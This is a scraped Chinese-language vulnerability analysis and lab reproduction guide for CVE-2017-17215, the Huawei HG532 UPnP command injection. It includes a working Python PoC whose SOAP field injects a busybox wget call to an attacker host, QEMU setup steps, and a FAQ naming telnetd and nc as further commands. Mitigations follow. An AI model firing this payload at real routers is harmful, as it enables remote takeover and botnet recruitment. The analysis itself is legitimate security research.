CVE-2017-17215华为HG532路由器命令注入漏洞深入分析与复现指南<\/h1>

漏洞概述<\/h2>
CVE-2017-17215是华为HG532系列路由器中存在的一个严重命令注入漏洞，该漏洞被Mirai病毒的升级版变种OKIRU\/SATORI利用进行传播。漏洞存在于设备的UPnP服务中，允许攻击者通过精心构造的SOAP请求实现任意命令执行。<\/p>

漏洞影响<\/h2>

受影响设备<\/strong>：华为HG532系列家用路由器<\/li>
漏洞类型<\/strong>：命令注入<\/li>
CVSS评分<\/strong>：9.8 (Critical)<\/li>
攻击复杂度<\/strong>：低<\/li>
所需权限<\/strong>：无需认证<\/li>

影响范围<\/strong>：远程代码执行<\/li> <\/ul>
漏洞原理分析<\/h2>
技术背景<\/h3>
UPnP(Universal Plug and Play)服务是路由器上常见的服务，用于简化网络设备的发现和通信。华为HG532路由器通过\/ctrlt\/DeviceUpgrade_1<\/code>端点处理固件升级相关的SOAP请求。<\/p>
漏洞根源<\/h3> 漏洞位于bin\/upnp<\/code>二进制文件中，具体在sub_40749c<\/code>函数中。该函数处理XML请求时存在以下问题：<\/p> 使用ATP_XML_GetChildNodeByName<\/code>获取<NewStatusURL><\/code>节点内容<\/li> 未对获取的内容进行任何过滤或验证<\/li> 直接将用户输入拼接到system()<\/code>函数执行的命令中<\/li> <\/ol> 漏洞利用机制<\/h3> 攻击者可以通过在<NewStatusURL><\/code>或<NewDownloadURL><\/code>节点中注入特殊字符(如分号;<\/code>)来闭合原有命令并执行任意命令。例如：<\/p> <NewStatusURL><\/span>;\/bin\/busybox wget -g 172.16.16.17 -l \/tmp\/1 -r \/1;<\/NewStatusURL><\/span> <\/span><\/span><\/code><\/pre>这将导致执行如下命令：<\/p> upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r ;\/bin\/busybox wget -g 172.16.16.17 -l \/tmp\/1 -r \/1; -d - <\/code><\/pre> 漏洞复现环境搭建<\/h2> 所需工具<\/h3> QEMU系统级模拟器<\/li> Debian Squeeze MIPS镜像<\/li> 华为HG532固件<\/li> Python requests库<\/li> <\/ol> 环境配置步骤<\/h3> 安装QEMU<\/strong>：<\/p> sudo apt-get install qemu-system-mips <\/span><\/span><\/code><\/pre><\/li> 下载并启动Debian MIPS虚拟机<\/strong>：<\/p> sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta \ <\/span><\/span><\/span><\/span>-hda debian_squeeze_mips_standard.qcow2 \ <\/span><\/span><\/span><\/span>-append "root=\/dev\/sda1 console=tty0"<\/span> -net nic -net tap -nographic <\/span><\/span><\/code><\/pre><\/li> 将HG532固件传输到虚拟机中<\/strong>：<\/p> scp HG532_firmware.bin root@qemu-ip:\/root\/ <\/span><\/span><\/code><\/pre><\/li> 设置固件环境<\/strong>：<\/p> mkdir hg532 <\/span><\/span>cd hg532 <\/span><\/span>unsquashfs ..\/HG532_firmware.bin <\/span><\/span>chroot . sh <\/span><\/span><\/code><\/pre><\/li> 启动UPnP服务<\/strong>：<\/p> .\/bin\/mic <\/span><\/span><\/code><\/pre><\/li> 验证服务运行<\/strong>：<\/p> netstat -l <\/span><\/span><\/code><\/pre>确认37215端口处于监听状态<\/p> <\/li> <\/ol> 漏洞利用(PoC)<\/h2> Python利用代码<\/h3> import<\/span> requests <\/span><\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "Authorization"<\/span>: "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=\/ctrlt\/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>data =<\/span> '''<?xml version="1.0" ?> <\/span><\/span><\/span> <s:Envelope xmlns:s="http:\/\/schemas.xmlsoap.org\/soap\/envelope\/" s:encodingStyle="http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"> <\/span><\/span><\/span> <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"> <\/span><\/span><\/span> <NewStatusURL>;\/bin\/busybox wget -g 172.16.16.17 -l \/tmp\/1 -r \/1;<\/NewStatusURL> <\/span><\/span><\/span> <NewDownloadURL>HUAWEIUPNP<\/NewDownloadURL> <\/span><\/span><\/span> <\/u:Upgrade> <\/span><\/span><\/span> <\/s:Body> <\/span><\/span><\/span><\/s:Envelope> <\/span><\/span><\/span>'''<\/span> <\/span><\/span> <\/span><\/span>response =<\/span> requests.<\/span>post('http:\/\/172.16.16.21:37215\/ctrlt\/DeviceUpgrade_1'<\/span>, headers=<\/span>headers, data=<\/span>data) <\/span><\/span>print(response.<\/span>text) <\/span><\/span><\/code><\/pre>利用步骤<\/h3> 修改PoC中的IP地址为目标路由器IP<\/li> 设置攻击机上的HTTP服务器<\/li> 执行PoC脚本<\/li> 观察目标路由器是否下载了指定文件<\/li> <\/ol> 静态分析指南<\/h2> 使用Binwalk提取固件<\/h3> binwalk -Me HG532_firmware.bin <\/span><\/span><\/code><\/pre>IDA Pro分析关键函数<\/h3> 在IDA中打开bin\/upnp<\/code>文件<\/li> 搜索字符串DeviceUpgrade_1<\/code>定位漏洞函数<\/li> 分析sub_40749c<\/code>函数的控制流<\/li> 重点关注ATP_XML_GetChildNodeByName<\/code>和system<\/code>函数的调用<\/li> <\/ol> 关键代码片段<\/h3> \/\/ 伪代码表示漏洞函数 <\/span><\/span><\/span><\/span>int<\/span> sub_40749c<\/span>() { <\/span><\/span> char<\/span> *<\/span>NewStatusURL =<\/span> ATP_XML_GetChildNodeByName("NewStatusURL"<\/span>); <\/span><\/span> char<\/span> cmd[256<\/span>]; <\/span><\/span> snprintf(cmd, sizeof<\/span>(cmd), "upg -g -U %%s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -"<\/span>, NewStatusURL); <\/span><\/span> system(cmd); \/\/ 漏洞点 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>防御措施<\/h2> 临时缓解方案<\/h3> 禁用UPnP服务<\/li> 配置防火墙规则阻止37215端口的访问<\/li> <\/ol> 长期解决方案<\/h3> 升级到华为官方发布的最新固件<\/li> 实施输入验证和过滤<\/li> 使用安全的函数替代system()<\/code>调用<\/li> 实施最小权限原则<\/li> <\/ol> 参考资源<\/h2> Huawei Home Routers in Botnet Recruitment<\/a><\/li> 华为HG532远程命令执行漏洞的新探索<\/a><\/li> CVE-2017-17215路由器漏洞分析<\/a><\/li> 华为HG532系列路由器远程命令执行漏洞分析<\/a><\/li> <\/ol> 附录<\/h2> 常见问题解答<\/h3> Q: 为什么mic启动后IP变为192.168.1.1？<\/strong><\/p> A: 这是HG532固件的默认配置行为，可以通过修改网络配置或使用桥接模式解决连接问题。<\/p> Q: 如何验证漏洞是否修复？<\/strong><\/p> A: 检查固件版本是否为最新，并尝试使用PoC进行测试（在授权环境下）。<\/p> Q: 除了wget，还能执行哪些命令？<\/strong><\/p> A: 由于使用了busybox，几乎所有busybox支持的命令都可以执行，如telnetd、nc等。<\/p>

CVE-2017-17215华为HG532路由器命令注入漏洞深入分析与复现指南<\/h1>

漏洞原理分析<\/h2>

技术背景<\/h3> UPnP(Universal Plug and Play)服务是路由器上常见的服务，用于简化网络设备的发现和通信。华为HG532路由器通过\/ctrlt\/DeviceUpgrade_1<\/code>端点处理固件升级相关的SOAP请求。<\/p>

漏洞复现环境搭建<\/h2>

漏洞利用(PoC)<\/h2>

静态分析指南<\/h2>

防御措施<\/h2>

附录<\/h2>

技术背景<\/h3>
UPnP(Universal Plug and Play)服务是路由器上常见的服务，用于简化网络设备的发现和通信。华为HG532路由器通过`\/ctrlt\/DeviceUpgrade_1<\/code>端点处理固件升级相关的SOAP请求。<\/p>`